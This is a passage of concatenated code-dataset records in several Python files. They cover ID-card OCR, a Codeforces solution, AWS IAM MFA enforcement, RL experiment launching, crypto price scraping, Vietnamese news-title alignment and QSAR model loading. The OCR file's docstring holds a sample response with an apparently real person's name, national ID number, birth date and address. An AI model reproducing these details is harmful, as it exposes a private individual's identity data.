+ str(paramBase64,'utf-8')\n m2.update(str1.encode('utf-8'))\n checkSum = m2.hexdigest()\n # 组装http请求头\n header = {\n 'X-CurTime': curTime,\n 'X-Param': paramBase64,\n 'X-Appid': APPID,\n 'X-CheckSum': checkSum,\n 'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8',\n }\n return header\n\n\ndef ocr(file, side='front'):\n try:\n f1_base64 = str(base64.b64encode(file), 'utf-8')\n\n data = {\n 'image': f1_base64\n }\n r = requests.post(URL, data=data, headers=getHeader())\n result = json.loads(str(r.content, 'utf-8'))\n if result['code'] != \"0\":\n #return {'status': False, 'msg': result['code'] + ':' + result['desc']}\n return {'status': False, 'msg': '当前身份证照片不合法'}\n if result['data']['error_code'] != 0:\n #return {'status': False, 'msg': str(result['data']['error_code']) + ':' + result['data']['error_msg']}\n return {'status': False, 'msg': '当前身份证照片不合法'}\n if result['data']['type'] != '第二代身份证背面' and result['data']['type'] != '第二代身份证' and result['data']['type'] != '身份证正反面或临时身份证':\n #return {'status': False, 'msg': '识别失败:' + str(r.content, 'utf-8')}\n return {'status': False, 'msg': '当前身份证照片不合法'}\n msg = 'success'\n if result['data']['type'] == '第二代身份证':\n return {\n 'status': True,\n 'msg': msg,\n 'data': {\n 'side': 'front',\n 'name': result['data']['name'],\n 'gender': result['data']['sex'],\n 'nation': result['data']['people'],\n 'birth': result['data']['birthday'].replace('年', '-').replace('月', '-').replace('日', ''),\n 'address': result['data']['address'],\n 'idnum': result['data']['id_number'],\n }\n }\n elif result['data']['type'] == '身份证正反面或临时身份证':\n return {\n 'status': True,\n 'msg': msg,\n 'data': {\n 'side': 'temp',\n 'name': result['data']['name'],\n 'gender': result['data']['sex'],\n 'nation': result['data']['people'],\n 'birth': result['data']['birthday'].replace('年', '-').replace('月', '-').replace('日', ''),\n 'address': result['data']['address'],\n 'idnum': result['data']['id_number'],\n 'authority': result['data']['issue_authority'],\n 'validity': result['data']['validity'],\n }\n }\n else:\n return {\n 'status': True,\n 'msg': msg,\n 'data': {\n 'side': 'back',\n 'authority': result['data']['issue_authority'],\n 'validity': result['data']['validity'],\n }\n }\n except FileNotFoundError as err:\n return {'status': False, 'msg': err.strerror}\n\n\nif __name__ == '__main__':\n result = ocr('../uploads/zhe.jpeg', 'front')\n print(result)\n\n\"\"\"\n{\"code\":\"0\",\"data\":{\"address\":\"湖北省红安县杏花乡嶂山村靠山店\",\"birthday\":\"1992年6月23日\",\"border_covered\":false,\"complete\":true,\"error_code\":0,\"error_msg\":\"OK\",\"gray_image\":false,\"head_blurred\":false,\"head_covered\":false,\"id_number\":\"421122199206231036\",\"issue_authority\":\"\",\"name\":\"秦凡\",\"people\":\"汉\",\"sex\":\"男\",\"time_cost\":{\"preprocess\":148,\"recognize\":258},\"type\":\"第二代身份证\",\"validity\":\"\"},\"desc\":\"success\",\"sid\":\"wcr000602fc@gz88bb11707e81463000\"}\n\n\"\"\"","sub_path":"api/XunfeiIdcardOCR.py","file_name":"XunfeiIdcardOCR.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"418276323","text":"def main():\n cc = int(input())\n \n for i in range(cc):\n n = int(input())\n nums = [int(x) for x in input().split()]\n nums_set = set(nums)\n\n cnt_max = 0\n for num in nums_set:\n if nums.count(num) > cnt_max:\n cnt_max = nums.count(num)\n\n if cnt_max > n//2:\n cnt_max = n//2\n print(cnt_max)\n\n\n \n\nif __name__ == '__main__':\n main()\n","sub_path":"codeforces/contests/round_634_div_3/problem_3.py","file_name":"problem_3.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"499805495","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\n\n# Preparing learning data set.\ndf = pd.read_csv('data.txt', header=None)\nX = df.iloc[0:100, [0,2]].values\n\n# Displaying data.\nstyle.use('fivethirtyeight')\nplt.scatter(X[:50, 0], X[:50, 1], color='red', marker='o', label='Setosa')\nplt.scatter(X[50:100, 0], X[50:100, 1], color='blue', marker='x', label='Versicolor')\nplt.xlabel('Sepal length [cm]')\nplt.ylabel('Petal length [cm]')\nplt.legend(loc='upper left')\nplt.title('Data set')\n\nplt.show()","sub_path":"classification/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"593399807","text":"#!/usr/bin/env python3\n\nimport sys\nimport boto3\nfrom boto3.session import Session\nimport datetime\nfrom pytz import timezone\n\n\nif(len(sys.argv) != 2):\n print(sys.argv[0] + ' [aws cli profile name]')\n sys.exit()\n\n\ntry:\n session = Session(profile_name=sys.argv[1])\nexcept Exception as e:\n print('\\n' + 'Profile Errors: ' + str(e) + '\\n')\n sys.exit()\n\n\niam = session.client('iam')\n\n\ndef get_users():\n user_lists = []\n res = iam.list_users()\n for lists in res['Users']:\n userlist = lists['UserName']\n user_lists.append(userlist)\n return user_lists\n\n\ndef check_create_date(username):\n res = iam.get_user(UserName=username)\n create_date = res['User']['CreateDate']\n create_date = create_date.astimezone(timezone('Asia/Tokyo'))\n return create_date\n\n\ndef get_mfa_stats(username):\n res = iam.list_mfa_devices(UserName=username)\n if not res['MFADevices']:\n mfa_stats = 'MFA_False'\n else:\n mfa_stats = 'MFA_True'\n return mfa_stats\n\n\ndef check_console_login(username):\n try :\n iam.get_login_profile(UserName=username)\n check_result = 'Login_Yes'\n except Exception :\n check_result = 'Login_No'\n return check_result\n\n\ndef suspend_user(username):\n update_res = []\n delete_res = iam.delete_login_profile(UserName=username)\n update_res.append(delete_res)\n check_access_keys = iam.list_access_keys(UserName=username)\n for key_lists in check_access_keys['AccessKeyMetadata']:\n res = iam.update_access_key(UserName=username, AccessKeyId=key_lists['AccessKeyId'], Status='Inactive')\n update_res.append(res)\n return update_res\n\n\ndef main():\n print('### check start.')\n for user_list in get_users():\n mfa_stats = get_mfa_stats(user_list)\n console_login_stats = check_console_login(user_list)\n if 'MFA_False' in mfa_stats and 'Login_Yes' in console_login_stats:\n create_date = check_create_date(user_list)\n create_date = create_date.date()\n now_date = datetime.date.today()\n res_date = (now_date-create_date).days\n \"\"\"\n var until_days is a duration of have not set MFA from account create day.\n \"\"\"\n until_days = 7\n if until_days <= res_date:\n print(user_list + ' is Console Login YES. but have not set MFA for more than ' +\n str(res_date) + 'days')\n result = suspend_user(user_list)\n #print(result)\n else:\n True\n print('### Finish')\n\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"user_check_suspend.py","file_name":"user_check_suspend.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"543551578","text":"#!/usr/bin/env python\n\"\"\"\nTianbing Xu 7-10-2017\n\"\"\"\nimport multiprocessing\nimport sys\nfrom subprocess import call\nimport numpy as np\n\nprefix_map = {\n 'c': 'cartpole_swing_up',\n 'd': 'pendulum',\n 'car': 'cartpole',\n 'mou': 'mountain_car',\n 'swim': 'swimmer',\n 'hopper': 'hopper',\n 'walker': 'walker',\n 'cheetah': 'cheetah',\n 'humanoid': 'humanoid',\n}\n\nalgorithm_map = {\n 'tr': 'trpo',\n 'svrg': 'svrg',\n}\n\nroot_dir = \"../logs/log_svrg_ant\"\nseed = 1\ngame = 'ant'\nalgorithm = \"svrg\"\nbatch_size = 50000\nmini_batch_sizes = [5000]\nmax_path_length = 1000\ndelta = 0.01\nn_itr = 1000\nmax_epochs = 1\ncg_iters = 10\nsubsample_factor = 0.1\nmax_batchs = [10]\n\n\nif __name__ == \"__main__\":\n for mini_batch_size in mini_batch_sizes:\n for max_batch in max_batchs:\n command = \"python benchmark_svrg.py {:} {:} {:} {:} {:} {:} {:} {:} {:} {:} {:} {:} {:}\".format(\n root_dir,\n algorithm,\n game,\n seed,\n batch_size,\n mini_batch_size,\n n_itr,\n max_path_length,\n delta,\n max_epochs,\n cg_iters,\n subsample_factor,\n max_batch)\n print(command)\n call(command, shell=True)\n\n plotOut = \"fig.{:}_{:}_{:}_{:}_{:}.png\".format(\n algorithm, game, n_itr, mini_batch_size, max_batch)\n plotcmd = \"python plotComparison.py -o {:} -a {:} -e {:} -t {:} -m 1 -p 0 -i {:}\".format(\n plotOut, algorithm_map[algorithm], prefix_map[game], n_itr, root_dir)\n print(plotcmd)\n #call(plotcmd, shell=True)\n","sub_path":"sandbox/rocky/tf/launchers/run_svrg_ant.py","file_name":"run_svrg_ant.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"93299695","text":"\"\"\"\n:Date: Dec 03, 2019\n:Version: 0.0.3\n\"\"\"\nimport functools\nimport logging\n\nimport tensorflow as tf\n\n\n# assuming args are just the doms\n# TODO: WARN(thadumi) doms could not be flat\ndef cross_args(*doms):\n # a list is not hashable for lru but a tuple is\n return _cross_args(tuple(doms))\n\n\n@functools.lru_cache(maxsize=None)\ndef _cross_args(doms):\n logging.debug('cross_args: computing a new tensor_cross_args for' + str(doms))\n result_doms = doms[0]\n\n lambdas = []\n for y_dom in doms[1:]:\n result_doms, _cross_2args = cross_2args(result_doms, y_dom)\n lambdas.append(_cross_2args)\n\n def tensor_cross_args(*tensors):\n result_tensor = tensors[0]\n for i in range(len(lambdas)):\n result_tensor = lambdas[i](result_tensor, tensors[i + 1])\n\n return result_tensor\n\n return result_doms, tensor_cross_args\n\n\ndef split_cross_args(result_tensor, *tensors):\n result_flat = tf.reshape(result_tensor,\n (tf.math.reduce_prod(tf.shape(result_tensor)[:-1]),\n tf.shape(result_tensor)[-1]))\n\n result_args = tf.split(result_flat, [tf.shape(tensor)[-1] for tensor in tensors], 1)\n return result_args\n\n\ndef split_cross_2args(result_tensor):\n return tf.split(result_tensor, 2, axis=-1)\n\n\ndef tensors_cross_2args_default(X, Y):\n return tf.concat([X, Y], axis=-1)\n\n\ndef expands_x(X, number_of_times_x_expands=0):\n '''\n def condition(i, args):\n return tf.greater(i, 0)\n\n def body(i, value):\n new_value = value[tf.newaxis, :]\n return tf.subtract(i, 1), new_value\n\n return tf.while_loop(condition, body,\n (number_of_times_x_expands, X),\n shape_invariants=(number_of_times_x_expands.get_shape(),\n tf.TensorShape([None] + X.shape.as_list())))\n\n '''\n\n tmp_X = X\n for _ in range(number_of_times_x_expands):\n tmp_X = tmp_X[tf.newaxis, :]\n\n return tmp_X\n\n\ndef expands_y(Y, number_of_times_y_expands=10):\n tmp_Y = Y\n for _ in range(number_of_times_y_expands):\n tmp_Y = tf.expand_dims(tmp_Y, -2)\n return tmp_Y\n\n\n@functools.lru_cache(maxsize=None)\ndef cross_2args(x_ltn_doms, y_ltn_doms):\n logging.debug('cross_2args: computing a new tensor_cross_args for' + str((x_ltn_doms, y_ltn_doms)))\n\n if (x_ltn_doms is None or x_ltn_doms == ()) and (y_ltn_doms is None or y_ltn_doms == ()):\n return tuple(), tensors_cross_2args_default\n\n X_Y = set(x_ltn_doms) - set(y_ltn_doms)\n Y_X = set(y_ltn_doms) - set(x_ltn_doms)\n\n # eX = X\n eX_doms = [x for x in x_ltn_doms]\n for y in Y_X:\n eX_doms = [y] + eX_doms\n number_of_times_x_expands = len(Y_X)\n\n # eY = Y\n eY_doms = [y for y in y_ltn_doms]\n for x in X_Y:\n eY_doms.append(x)\n number_of_times_y_expands = len(X_Y)\n\n perm_eY = []\n for y in eY_doms:\n perm_eY.append(eX_doms.index(y))\n default_perm = perm_eY + [len(perm_eY)]\n\n mult_eX_size = len(eX_doms) + 1\n mult_eY_size = len(eY_doms) + 1\n\n @tf.function\n def tensors_cross_2args(X, Y):\n eX = expands_x(X, number_of_times_x_expands=number_of_times_x_expands)\n eY = expands_y(Y, number_of_times_y_expands=number_of_times_y_expands)\n eY = tf.transpose(eY, perm=default_perm)\n\n mult_eX = [1] * mult_eX_size\n mult_eY = [1] * mult_eY_size\n\n for i in range(len(mult_eX) - 1):\n mult_eX[i] = tf.math.maximum(1, tf.math.floordiv(tf.shape(eY)[i], tf.shape(eX)[i]))\n mult_eY[i] = tf.math.maximum(1, tf.math.floordiv(tf.shape(eX)[i], tf.shape(eY)[i]))\n\n return tf.concat([tf.tile(eX, mult_eX), tf.tile(eY, mult_eY)], axis=-1)\n\n return tuple(eX_doms), tensors_cross_2args\n","sub_path":"ltn/backend/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"558932390","text":"import requests\nimport csv\nimport time\nCryptoPairs = {'BTCUSD':'BTC','ETHUSD':'ETH','BNBUSD':'BNB','BUSDUSD':'BUSD','BCHUSD':'BCH','ADAUSD':'ADA','LINKUSD':'LINK', 'ATOMUSD':'ATOM', 'CROUSD':'CRO',\n 'DOGEUSD':'DOGE', 'EOSUSD':'EOS', 'FTTUSD':'FTT','IOTUSD':'MIOTA', 'LTCUSD':'LTC','XMRUSD':'XMR', 'XEMUSD':'XEM', 'DOTUSD':'DOT', 'XRPUSD':'XRP','SOLUSD':'SOL', \n 'XLMUSD':'XLM', 'USDTUSD':'USDT', 'THETAUSD':'THETA', 'TRXUSD':'TRX', 'VETUSD':'VET', 'FILUSD':'FIL', 'SHIBUSD':'SHIB','USDCUSD':'USDC', 'MATICUSD':'MATIC',\n 'ALGOUSD':'ALGO',}\n\ndef countdown(t):\n \n while t:\n mins, secs = divmod(t, 60)\n timer = '{:02d}:{:02d}'.format(mins, secs)\n print(timer, end=\"\\r\")\n time.sleep(1)\n t -= 1\n\nclass Crypto_USD:\n def __init__(self):\n self.cryptoValue = []\n for crypto in CryptoPairs.keys():\n \n self.values = requests.get('https://www.bitstamp.net/api/v2/ticker/'+crypto.lower())\n try:\n print(self.values.json(), crypto.lower())\n \n self.cryptoPrice = (self.values.json().get('last'))\n priceCount = 0\n \"\"\" for price in self.cryptoPrice: #find the price between tens hundreds and thousands\n priceCount += 1 # to find the location of the period in the price\n if (price == '.' and priceCount == 6):# if price equal or over ten thosand put the comma in \n self.cryptoPrice = self.cryptoPrice[0:2]+','+self.cryptoPrice[2:8] \n elif(price == '.' and priceCount == 5):# if price over a thosand and below ten thosands put the comma in \n self.cryptoPrice = self.cryptoPrice[0]+','+self.cryptoPrice[1:7]\n elif(price == '.' and priceCount == 4):#if price equal to a hundred\n self.cryptoPrice = self.cryptoPrice[0:6]\n elif(price == '.' and priceCount == 3):#if price equal to a hundred\n self.cryptoPrice = self.cryptoPrice[0:5] \"\"\"\n self.cryptoValue.append([CryptoPairs.get(crypto),crypto.upper(), self.cryptoPrice, self.values.json().get('volume')]) \n except:\n print('404')\n print(self.cryptoValue)\n file_path = '/Users/EL-_-KDS/Documents/website Projects/Cryptonel/Exchange/Exhange_Data/Bitstamp/Price Results.csv'\n with open(file_path, 'w') as newFile:\n csvWriter = csv.writer(newFile)\n csvWriter.writerow(['Coin', 'Name_Pair', 'Price', 'volume'])\n for line in self.cryptoValue:\n csvWriter.writerow(line)\n","sub_path":"Exchange/Exhange_Data/Bitstamp/Crypto_Price_V2.py","file_name":"Crypto_Price_V2.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"119990096","text":"from django.contrib import admin\nfrom .models import Cliente, Cotizacion\n# Register your models here.\nclass ClienteAdmin(admin.ModelAdmin):\n readonly_fields = ('rut', 'nombre','apellido','correo','telefono','empresa')\n\nclass CotizacionAdmin(admin.ModelAdmin):\n readonly_fields = ('fecha', 'servicio' ,'cliente')\n\nadmin.site.register(Cliente, ClienteAdmin)\nadmin.site.register(Cotizacion, CotizacionAdmin)\n\n# Register your models here.\n","sub_path":"cotizacion/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"89438049","text":"import numpy.linalg\nfrom vncorenlp import VnCoreNLP\nimport pdb\nimport re\nimport numpy as np\nimport math\nimport datetime\nimport random\nimport sys\n\nvector = dict()\nlist_stopwords = list()\n\ndef compareTitle(src_title, tgt_title):\n\n count = 0\n for word in src_title:\n if (word in tgt_title):\n count = count + 1\n\n return (count / len(tgt_title))\n\ndef loadStopWords():\n f = open(\"stopwords.txt\", \"r\", encoding=\"utf-8\")\n for line in f:\n line = line.strip()\n list_stopwords.append(line)\n f.close()\n\ndef removeStopWord(words):\n global list_stopwords\n list_new_word = list()\n\n for word in words:\n if word not in list_stopwords:\n if(word.strip() != \"\"):\n list_new_word.append(word)\n return list_new_word\n\ndef loadVectorEmbbeding(vector):\n f = open(\"dict.txt\", \"r\", encoding=\"utf-8\")\n for line in f:\n line = line.strip()\n\n line = line.split(\" \")\n key = str(line[0])\n\n if('@@' in key):\n continue\n #print(line[1])\n\n if(key.lower() in vector):\n continue\n vector[key.lower()] = int(line[1])\n f.close()\n\ndef cosineSinmilar(src_vector, tgt_vector):\n #pdb.set_trace()\n y = np.sqrt(np.sum(np.square(src_vector))) * np.sqrt(np.sum(np.square(tgt_vector)))\n if y == 0:\n return 0\n x = np.sum(src_vector * tgt_vector)\n if x == 0:\n return 0\n return x / y\n\ndef wordToVector(word):\n\n global vector\n if word in vector:\n return vector[word]\n else:\n return random.randrange(1000, 20000)\n\ndef TF_IDF(src_sentence, tgt_sentence):\n dict_words = {}\n dict_src = {}\n dict_tgt = {}\n TF_IDF_CountWords(dict_words, dict_src, src_sentence)\n\n\n TF_IDF_CountWords(dict_words, dict_tgt, tgt_sentence)\n\n TF_IDF_Document_Point(dict_words, dict_src, dict_tgt)\n TF_IDF_Document_Point(dict_words, dict_tgt, dict_src)\n\n\n\n tf_idf_sorce = cosineSinmilar(TF_IDF_Vector(dict_words, dict_src), TF_IDF_Vector(dict_words, dict_tgt))\n\n if tf_idf_sorce > 0.97:\n return tf_idf_sorce\n\n if len(dict_tgt) > len(dict_src):\n size = len(dict_tgt)\n else:\n size = len(dict_src)\n \"\"\"\n x = DissSimilarVector(dict_src, dict_tgt, size)\n x2 = DissSimilarVector(dict_tgt, dict_src, size)\n \n distance = cosineSinmilar(x, x2)\n print(distance)\n sorce = 0.0\n\n if distance >0.2 and distance < 0.3:\n sorce = 0.025\n\n if distance >0.4 and distance < 0.6:\n sorce = 0.035\n\n if distance >0.6 and distance < 0.8:\n sorce = 0.04\n\n if distance >0.8:\n sorce = 0.045\n \"\"\"\n\n return tf_idf_sorce\n\ndef TF_IDF_CountWords(dict_words, dict_, words):\n\n for word in words:\n if word not in dict_words:\n dict_words[word] = 1\n else:\n dict_words[word] = dict_words[word] + 1\n\n if word not in dict_:\n dict_[word] = 1\n else:\n dict_[word] = dict_[word] + 1\n\ndef TF_IDF_Document_Point(dict_words, dict_src, dict_tgt ):\n\n idf = {}\n for word in dict_src :\n\n number_of_word_in_sentences = dict_src[word]\n number_of_sentences_contains = 1\n\n tf = (number_of_word_in_sentences / dict_words[word])\n\n if word in dict_tgt:\n number_of_sentences_contains = number_of_sentences_contains + 1\n\n #idf = math.log(2/number_of_sentences_contains)\n idf = math.log(2/number_of_sentences_contains,10)\n dict_src[word] = tf * idf\n\ndef TF_IDF_Vector(dict_words, dict_src):\n vector = np.zeros(len(dict_words))\n\n start = 0\n for word in dict_words:\n if word in dict_src:\n if(dict_src[word] == 0):\n vector[start] = 1\n else:\n vector[start] = dict_src[word]\n else:\n vector[start] = -1\n start = start + 1\n return vector\n\ndef DissSimilarVector(dict_src, dict_tgt,size):\n vector = np.ones(size)\n\n start = 0\n # for each word not in dict_tgt\n for word_src in dict_src:\n\n if word_src not in dict_tgt:\n vector[start] = -wordToVector(word_src)\n print(wordToVector(word_src))\n start += 1\n continue\n\n vector[start] = wordToVector(word_src)\n start += 1\n print(vector)\n return vector\n\ndef sentenceToTokenize(sentences):\n global annotator\n flag = False\n\n word_segmented_text = annotator.tokenize(sentences)\n tokenSentence = \"\"\n\n for sentence in word_segmented_text[0]:\n if(sentence !=\"\" or sentence!= \"\" ):\n if(sentence == \"_\"):\n tokenSentence = tokenSentence.strip() + sentence\n flag = True\n continue\n if flag:\n flag = False\n tokenSentence = tokenSentence + sentence\n continue\n tokenSentence = tokenSentence + \" \" + sentence\n\n return tokenSentence.strip()\n\ndef preprocessString(list_dict_src, token=True):\n start = 0\n length = len(list_dict_src)\n\n while (start < length):\n\n sentence = list_dict_src[start]['title']\n\n sentence = sentence.strip()\n sentence = re.sub(\"[!.,@#$%^&*()?<>“]+\", \"\", sentence)\n sentence = re.sub(\"[-]+\", \" \", sentence)\n sentence = re.sub(\"\\s+\", \" \", sentence)\n\n if(token):\n sentence = sentenceToTokenize(sentence)\n sentence = sentence.lower()\n list_dict_src[start]['title'] = sentence\n if (token):\n list_dict_src[start][\"words\"] = removeStopWord(sentence.split(\" \"))\n else:\n list_dict_src[start][\"words\"] = sentence.split(\" \")\n start = start + 1\n\n\"\"\"\nAlign News By Title And Date\n\"\"\"\ndef AlignByTitleAndDateNews(list_dict_src, list_dict_tgt, tgt, date_range=20, score_lim=0.4, score=0.8, token=True):\n \"\"\"\n\n :param list_dict_src: danh sách các dictionary chứa link, date, title ngôn ngữ nguồn\n :param list_dict_tgt: danh sách các dictionary chứa link, date, title ngôn ngữ đích được dịch sang ngôn ngữ nguồn\n :param tgt: ngôn ngữ đích\n :param date_range: giới hạn thời gian\n :param score_lim: ngưỡng thấp nhất có thể lấy\n :param score: ngưỡng bắt đầu\n :param token: có token các\n :return:\n\n \"\"\"\n for link in list_dict_src:\n src_datetime = datetime.datetime.strptime(link['date'], \"%d/%m/%Y\")\n link['date'] = src_datetime\n\n for link in list_dict_tgt:\n tgt_datetime = datetime.datetime.strptime(link['date'], \"%d/%m/%Y\")\n link['date'] = tgt_datetime\n\n preprocessString(list_dict_src, token=token)\n preprocessString(list_dict_tgt, token=token)\n\n lim_src = len(list_dict_src)\n lim_tgt = len(list_dict_tgt)\n\n list_align_title = list()\n print(len(list_dict_src), len(list_dict_tgt))\n while score >= score_lim:\n print(score)\n start_src = 0\n\n checkPoint = 0\n time = - date_range\n while (start_src < lim_src):\n max_ = 0\n start_tgt = checkPoint\n true_tgt = 0\n print(start_tgt)\n\n while (start_tgt < lim_tgt):\n\n delta = list_dict_src[start_src]['date'] - list_dict_tgt[start_tgt]['date']\n # thoi gian vuot qua khoang date_range\n\n if(abs(delta.days) > date_range):\n break\n\n if delta.days < 0 and time > delta.days:\n time = delta.days\n checkPoint = start_tgt\n\n if(token):\n true_sore = TF_IDF(list_dict_src[start_src][\"words\"], list_dict_tgt[start_tgt]['words'])\n else:\n true_sore = compareTitle(list_dict_src[start_src][\"words\"], list_dict_tgt[start_tgt]['words'])\n\n if (max_ < true_sore):\n max_ = true_sore\n true_tgt = start_tgt\n\n if(max_ >= 1.0):\n break\n\n\n start_tgt = start_tgt + 1\n # print(list_dict_src[start_src]['title'], max_)\n if (max_ < score_lim):\n del (list_dict_src[start_src])\n lim_src = len(list_dict_src)\n continue\n\n if max_ > score:\n f = open(\"thongke.csv\", \"a\", encoding=\"utf-8\")\n f.write(\"{} \\t {} \\t {}\\n\".format(list_dict_src[start_src]['title'], list_dict_tgt[true_tgt]['title'], max_))\n f.close()\n list_align_title.append({\"vi\": list_dict_src[start_src]['url'], tgt: list_dict_tgt[true_tgt]['url']})\n\n del (list_dict_src[start_src])\n del (list_dict_tgt[true_tgt])\n\n lim_src = len(list_dict_src)\n lim_tgt = len(list_dict_tgt)\n continue\n\n start_src = start_src + 1\n\n score = score - 0.1\n return list_align_title\n\ndef AlignByTitleNews(list_dict_src, list_dict_tgt , tgt, score_lim=0.35, score=0.75, token = True):\n\n src = \"vi\"\n\n if(len(list_dict_src) > len(list_dict_tgt)):\n temp_list = list_dict_src.copy()\n list_dict_src = list_dict_tgt\n list_dict_tgt = temp_list\n temp = tgt\n tgt = \"vi\"\n src = temp\n\n\n lim_src = len(list_dict_src)\n lim_tgt = len(list_dict_tgt)\n print(len(list_dict_src), len(list_dict_tgt))\n preprocessString(list_dict_src)\n preprocessString(list_dict_tgt)\n\n list_align_title = list()\n\n while score >= score_lim:\n print(score)\n start_src = 0\n\n checkPoint = 0\n\n while (start_src < lim_src):\n max_ = 0\n start_tgt = checkPoint\n true_tgt = 0\n # print(start_tgt)\n\n while (start_tgt < lim_tgt):\n # so sánh title\n if(token):\n true_sore = TF_IDF(list_dict_src[start_src]['words'],\n list_dict_tgt[start_tgt]['words'])\n else:\n true_sore = compareTitle(list_dict_src[start_src][\"words\"], list_dict_tgt[start_tgt]['words'])\n if (max_ < true_sore):\n max_ = true_sore\n true_tgt = start_tgt\n\n if (max_ >= 1.0):\n break\n\n if (true_sore < score):\n start_tgt = start_tgt + 1\n continue\n\n start_tgt = start_tgt + 1\n\n # print(list_dict_src[start_src]['title'], max_)\n if (max_ < score_lim):\n del (list_dict_src[start_src])\n lim_src = len(list_dict_src)\n continue\n\n if max_ > score:\n print(list_dict_src[start_src]['title'] + \" / \" + list_dict_tgt[true_tgt]['title'], max_)\n\n list_align_title.append({src: list_dict_src[start_src]['url'], tgt: list_dict_tgt[true_tgt]['url']})\n\n del (list_dict_src[start_src])\n del (list_dict_tgt[true_tgt])\n\n lim_src = len(list_dict_src)\n lim_tgt = len(list_dict_tgt)\n continue\n\n start_src = start_src + 1\n\n score = score - 0.1\n return list_align_title\n# To perform word segmentation, POS tagging and then NER\n# annotator = VnCoreNLP(\"\", annotators=\"wseg,pos,ner\", max_heap_size='-Xmx2g')\n# To perform word segmentation and then POS tagging\n# annotator = VnCoreNLP(\"\", annotators=\"wseg,pos\", max_heap_size='-Xmx2g')\n# To perform word segmentation only\n# annotator = VnCoreNLP(\"\", annotators=\"wseg\", max_heap_size='-Xmx500m')\nloadVectorEmbbeding(vector)\nloadStopWords()\nannotator = VnCoreNLP(\"./VnCoreNLP/VnCoreNLP-1.1.1.jar\", annotators=\"wseg,pos,ner,parse\", max_heap_size='-Xmx2g',port=8887)\n\nif __name__ == '__main__':\n\n # Input\n text_origin = \"việt_nam hợp_tác hàn_quốc\"\n text_trans = \"việt_nam hợp_tác lào\"\n # To perform word segmentation, POS tagging, NER and then dependency parsing\n #annotated_text = annotator.annotate(text)\n #print(sentenceToTokenize(text_trans).split(\" \"))\n #print(sentenceToTokenize(text_origin).split(\" \"))\n print(removeStopWord(text_trans.split(\" \")))\n print(removeStopWord(text_origin.split(\" \")))\n print(TF_IDF(removeStopWord(text_trans.split(\" \")), removeStopWord(text_origin.split(\" \"))))\n","sub_path":"SentenceAlign.py","file_name":"SentenceAlign.py","file_ext":"py","file_size_in_byte":12427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"355161688","text":"\"\"\"\nProgram: runmodel.py\n\nWritten: Joslyn Jung & Andrew Fant\n\nThis is a python program to load a saved QSAR regression model and make a prediction on a set of molecules provided in\nthe SMILES molecular data format.\n\ninput: one file named testset-2.smi. SMILES formatted holding the structure of the molecules in the model\n training set.\n\noutput: prediction\n\"\"\"\n\nimport sys\nimport pathlib\nproject_path = pathlib.Path('~/repositories/herg')\nproject_path = project_path.expanduser()\ncode_dir = project_path / 'common'\nsys.path.insert(0, str(code_dir))\n\nimport os\nimport numpy as np\nfrom rdkit.Chem import AllChem as Chem\nfrom molvs import Standardizer\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nfrom descriptor_setup import dnames, dlist\nfrom rdkit import DataStructs\nfrom rdkit.Chem.Fingerprints import FingerprintMols\nimport pickle\n\n\ndef read_mols(basename, randsplit, randstate):\n\n currworkdir = os.getcwd()\n datadir = os.path.join(currworkdir,'data')\n modeldir = os.path.join(currworkdir,'models')\n mol_data_filename = basename + '.smi'\n act_data_filename = basename + '.act'\n moldatafile = os.path.join(datadir,mol_data_filename)\n actdatafile = os.path.join(datadir,act_data_filename)\n\n # Load model from file\n model_filename = \"model_RF_\" + repr(randsplit) + \"_\" + repr(randstate) + \".dat\"\n model_file = os.path.join(modeldir,model_filename)\n loaded_model = pickle.load(open(model_file, \"rb\"))\n\n index_filename = \"indices_\" + repr(randsplit) + \"_\" + repr(randstate) + \".dat\"\n index_file = os.path.join(modeldir,index_filename)\n with open(index_file, 'rb') as f:\n indexes = pickle.load(f)\n\n appdom_fp_filename = \"training-FPs_\" + repr(randsplit) + \"_\" + repr(randstate) + \".dat\"\n appdom_fp_file = os.path.join(modeldir,appdom_fp_filename)\n with open(appdom_fp_file, 'rb') as f:\n appdom_fps = pickle.load(f)\n\n appdom_rad_filename = \"AD-radius_\" + repr(randsplit) + \"_\" + repr(randstate) + \".dat\"\n appdom_rad_file = os.path.join(modeldir,appdom_rad_filename)\n with open(appdom_rad_file, 'rb') as f:\n appdom_radius = pickle.load(f)\n\n # Read in molecules from test set\n molfh = open(moldatafile)\n\n molecules = [] # array of tuples: (molecule, molecule name)\n\n for molline in molfh:\n line = molline.split()\n mol = Chem.MolFromSmiles(line[0])\n molname = line[1]\n molecules.append((mol, molname))\n\n molfh.close()\n\n if os.path.isfile(actdatafile):\n actfh = open(actdatafile)\n\n activities = [] # array of tuples: (activity, molecule name)\n\n for actline in actfh:\n line = actline.split()\n act = float(line[1])\n actname = line[0]\n activities.append((act, actname))\n\n actfh.close()\n\n mols_train = []\n molnames_train = []\n\n if 'activities' in locals():\n acts_train = []\n actnames_train = []\n\n for i in range(len(molecules)):\n mols_train.append(molecules[i][0])\n molnames_train.append(molecules[i][1])\n if 'activities' in locals():\n acts_train.append(activities[i][0])\n 